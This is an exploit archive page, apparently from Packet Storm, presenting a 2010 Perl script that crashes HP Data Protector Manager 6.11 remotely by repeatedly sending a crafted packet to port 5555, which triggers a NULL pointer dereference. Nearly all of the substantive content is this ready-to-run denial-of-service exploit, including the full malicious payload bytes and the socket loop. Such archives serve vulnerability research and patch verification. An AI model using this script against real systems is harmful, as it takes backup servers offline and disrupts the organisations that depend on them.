exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

HP Data Protector Manager 6.11 Denial Of Service

HP Data Protector Manager 6.11 Denial Of Service
Posted Oct 6, 2010
Authored by Pepelux | Site enye-sec.org

HP Data Protector Manager version 6.11 NULL pointer dereference remote denial of service exploit.

tags | exploit, remote, denial of service
SHA-256 | 0656224a4a7971dfd8da2db9267e240a02ea3b0541ef905aeba6d75aea755ad4

HP Data Protector Manager 6.11 Denial Of Service

Change Mirror Download
#!/usr/bin/perl

# ===============================
# HP Data Protector Manager v6.11
# ===============================
#
# Bug: NULL Pointer Dereference Remote Denial of Service Vulnerabilities
#
# Software: http://www.hp.com
# Date: 06/10/2010
# Author: Pepelux - pepelux[AT]enye-sec[DOT]com
# http://www.enye-sec.org - http://www.pepelux.org
#
# Vulnerable file: Program Files\OmniBack\bin\MSVCR71.dll
# Vulnerable function: wtoi
#
# Tested on Windows XP SP2 & Windows XP SP3

use IO::Socket;

my ($server, $port) = @ARGV ;

unless($ARGV[0] || $ARGV[1]) {
print "Usage: perl $0 <host> [port]\n";
print "\tdefault port = 5555\n\n";
exit 1;
}

$port = 5555 if ($ARGV[0]);

if ($^O =~ /Win/) {system("cls");}else{system("clear");}

my $buf = "\x00\x00\x00\x41\xff\xfe\x32\x00\x00\x00\x20\x00\x41\x00\x41\x00".
"\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00".
"\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00".
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00".
"\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\xff\xff\x20\x00\x31\x00".
"\x35\x00\x00\x00\x00\x00";

print "[+] Connecting to $server:$port ...\n";

my $sock1 = new IO::Socket::INET (PeerAddr => $server, PeerPort => $port, Timeout => '10', Proto => 'tcp') or die("Server $server is not available.\n");

print "[+] Sending malicious packet ...\n";

my $crashed = 0;

while($crashed eq 0) {
print $sock1 "$buf" or $crashed = 1;
}

print "\n[x] Server crashed!\n";
exit;

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close